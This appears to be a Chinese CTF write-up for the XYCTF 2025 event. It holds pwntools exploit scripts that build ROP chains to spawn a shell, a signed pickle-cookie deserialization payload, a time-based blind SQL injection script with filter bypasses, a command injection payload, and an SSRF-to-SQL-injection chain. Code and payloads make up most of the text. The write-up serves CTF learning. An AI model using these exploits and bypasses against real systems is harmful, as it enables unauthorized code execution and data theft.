xor_rsi = 0x00000000004010e4
bss = 0x404100
rbp = 0x000000000040117d
ret =0x000000000040101a
add_rsi = 0x00000000004010eb
pay=b'a'*0x218+b'\x18'+b'\x02'+b'\x00'*2+b'\x1d'+b'\x02'+b'\x00'*2+p64(bss+0x220)+p64(0x401207)
io.sendline(pay)
ret = 0x000000000040101a
pay=b'a'*(0x1f8)+p64(0x404060)+p64(elf.got['puts'])+p64(0)*2+b'\x18'+b'\x02'+b'\x00'*2+b'\x1d'+b'\x02'+b'\x00'*2+p64(0x4042e0)+p64(xor_rsi)+p64(add_rsi_rbp20)+p64(gadget1)+p64(elf.plt['puts'])+p64(rbp)+p64(0x4042c0)+p64(xor_rsi)+p64(add_rsi)+p64(gadget1)+p64(xor_rsi)+p64(elf.plt['setvbuf'])+p64(rbp)+p64(bss+0x420)+p64(0x401207)
io.sendline(pay)
puts = u64(io.recvuntil(b’\x7f’)[-6:])
libc.address = puts - libc.sym['puts']
system = libc.sym['system']
pay=b'a'*(0x1f8)+p64(0x404758)+p64(elf.got['puts'])+p64(0)*2+b'\x18'+b'\x02'+b'\x00'*2+b'\x1d'+b'\x02'+b'\x00'*2+p64(0x4044d8)+p64(xor_rsi)+p64(add_rsi)+p64(gadget1)+p64(ret)+p64(ret) +p64(system)*0x41+b'/bin/sh\x00'
io.sendline(pay)
io.interactive()
EZ3.0
from pwn import *
# io = process(["qemu-mipsel","-L","/usr/mipsel-linux-gnu/",'-g','6666',"./pwn"])
io = remote('47.94.172.18',22709)
system = 0x400B70
gadget = 0x0400A20
'''
lw $a0, 8($sp)
lw $t9, 4($sp)
jalr $t9
nop
'''
pay = b'a'*(0x1c+8)+p32(gadget)
pay = pay.ljust(0x28,b'a')+b'bbbb'+p32(system)+p32(0x3fff808c)
io.sendlineafter('> ',pay)
io.interactive()
明日方舟寻访模拟器
Exp:
ret = 0x000000000040101a
pay = b'a'*0x40+p64(bss_start+0x40)+p64(magic)+p64(0)*2
io.sendafter('请输入你的名字:\n',pay)
pay2 = p64(0)+p64(0x00000000004018e5)+p64(bss_start+0x28)+p64(ret)+p64(system)+b'/bin/sh\x00'
pay2 = pay2.ljust(0x40)+p64(bss_start)+p64(0x40191B)
io.sendline(pay2)
io.interactive()WEB
Signin
通过查看附件发现里面有任意文件读取漏洞,绕过方式为·
/download?filename=./.././../secret.txt
然后查看发现bootle的cookie使用pickle序列化
让ai根据bootle的代码写个反序列化构造
import pickle, base64, hmac, hashlib
tut = b'Hell0_H@cker_Y0u_A3r_Sm@r7' #读取的secret.txt
digestmod = hashlib.sha256
msg=''
payload = b'''cos
system
(S'cat /f* > flag.txt'
tR.'''
payload_b64 = base64.b64encode(payload)
sig = hmac.new(tut, payload_b64, digestmod=digestmod).digest()
sig_b64 = base64.b64encode(sig)
value_to_pass = f"!{sig_b64.decode()}?{payload_b64.decode()}"
print(value_to_pass)
生成的恶意cookie:
把恶意cookie写入数据包,访问/secret 让执行反序列化漏洞
在通过任意文件读取漏洞读取/download?filename=flag.txt
flag{We1c0me_t0_XYCTF_2o25!The_secret_1s_L@men7XU_L0v3_u!}
ez_puzzle
手动拼,在拼出来的一瞬间在控制台输入:startTime = Date.now() - 1900; 
ezsql
访问一个登录框,测测有没有sql注入
经过一波测试,大概过滤了& * || and union like handler等等
于是想到sql盲注的思路进行注入
写一个盲注的脚本
import requests
import time
def bool_blind_injection():
result = ""
url = "http://eci-2ze7pu55q45bh9tllk04.cloudeci1.ichunqiu.com/login.php"
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
for current_position in range(1, 50):
found = False
# 这里使用二分法加速猜解
low, high = 33, 126
while low <= high and not found:
mid = (low + high) // 2
payload = f"username=12'^case%09when%09(ascii(substr(database()%09from%09{current_position}%09for%091))>{mid})%09then%09sleep(5)%09else%090%09end#&password=123456"
start_time = time.time()
try:
r = requests.post(url, data=payload, headers=headers, timeout=8)
print(r.request.body)
# print(r.text.encode('utf-8'))
elapsed = time.time() - start_time
if elapsed > 2:
low = mid + 1
else:
high = mid - 1
except:
continue
if low > high:
result += chr(low)
print(f"[+] 当前的结果: {result}")
else:
break
print(f"[!] 最终的结果: {result}")
bool_blind_injection()
跑出了数据库testdb
更换脚本里面的payload,进行爆破表名
payload = f"username=12'^case%09when%09(ascii(substr((select%09group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema='testdb')%09from%09{current_position}%09for%091))>{mid})%09then%09sleep(5)%09else%090%09end#&password=123456"
发现有两个表名double_check,user,进入user表查看里面的列名
payload = f"username=12'^case%09when%09(ascii(substr((select%09group_concat(column_name)%09from%09information_schema.columns%09where%09table_name='user')%09from%09{current_position}%09for%091))>{mid})%09then%09sleep(5)%09else%090%09end#&password=111"
发现里面存在
username,password
后面还有很多,中途容器不小心停掉了,就不列出来了
爆破username、password的值,得到账号密码
username:yudeyoushang 
password:zhonghengyisheng
登录进去之后
发现还需要key,猜测是不是可能在另外一个表里面,于是爆破double_check表里面的列名
发现里面存在secret列名,于是进行爆破这个值
dtfrtkcc0czkoua9S
输入key之后,进去发现
这是个简单的rce,
Payload:cat${IFS}/flag.txt>test.txt
执行完之后,直接访问test.txt文件
得到答案
XYCTF{77e38007-64a6-42ba-83f6-8ff58d3fd0d5}
FATE
分析代码,首先是:
@app.route('/proxy', methods=['GET'])
def nolettersproxy():
url = flask.request.args.get('url')
if not url:
return flask.abort(400, 'No URL provided')
target_url = "http://lamentxu.top" + url
for i in blacklist:
路由为/proxy,参数为url,由于url前拼接了域名,要加@绕过,组合后为http://lamentxu.top@127.0.0.1:8080
然后是这个代码
@app.route('/1337', methods=['GET'])
def api_search():
if flask.request.remote_addr == '127.0.0.1':
code = flask.request.args.get('0')
if code == 'abcdefghi':
req = flask.request.args.get('1')
try:
req = binary_to_string(req)
print(req)
req = json.loads(req) # No one can hack it, right? Pickle unserialize is not secure, but json is ;)
except:
flask.abort(400, "Invalid JSON")
if 'name' not in req:
flask.abort(400, "Empty Person's name")
name = req['name']
if len(name) > 6:
flask.abort(400, "Too long")
if '\'' in name:
flask.abort(400, "NO '")
if ')' in name:
flask.abort(400, "NO )")
"""
Some waf hidden here ;)
"""可以看到想要本地访问可以造成ssrf漏洞,但有过滤,可以用127.0.0.1的十进制2130706433来绕过,然后abcdefghi可以用二次url编码绕过
然后执行sql语句
cur.execute(f"SELECT FATE FROM FATETABLE WHERE NAME=UPPER(UPPER(UPPER(UPPER(UPPER(UPPER(UPPER('{code}')))))))")
由于代码是将解析后的字段值传给sql查询,所以在name里也嵌套一个对象,然后根据闭合构造poc:{ "name": { "))))))) union select FATE FROM FATETABLE WHERE NAME= \"LAMENTXU\" --+": "ctf" } }
由于过滤了一些符号所以用二进制对poc进行转换绕过,最后拼接前面的ssrf利用payload,
?url=@2130706433:8080/1337?0=%2561%2562%2563%2564%2565%2566%2567%2568%2569%261=011110110000101000100000001000000010001001101110011000010110110101100101001000100011101000100000011110110000101000100000001000000010000000100000001000100010100100101001001010010010100100101001001010010010100100100000011101010110111001101001011011110110111000100000011100110110010101101100011001010110001101110100001000000100011001000001010101000100010100100000010001100101001001001111010011010010000001000110010000010101010001000101010101000100000101000010010011000100010100100000010101110100100001000101010100100100010100100000010011100100000101001101010001010011110100100000010111000010001001001100010000010100110101000101010011100101010001011000010101010101110000100010001000000010110100101101001010110010001000111010001000000010001001100011011101000110011000100010000010100010000000100000011111010000101001111101
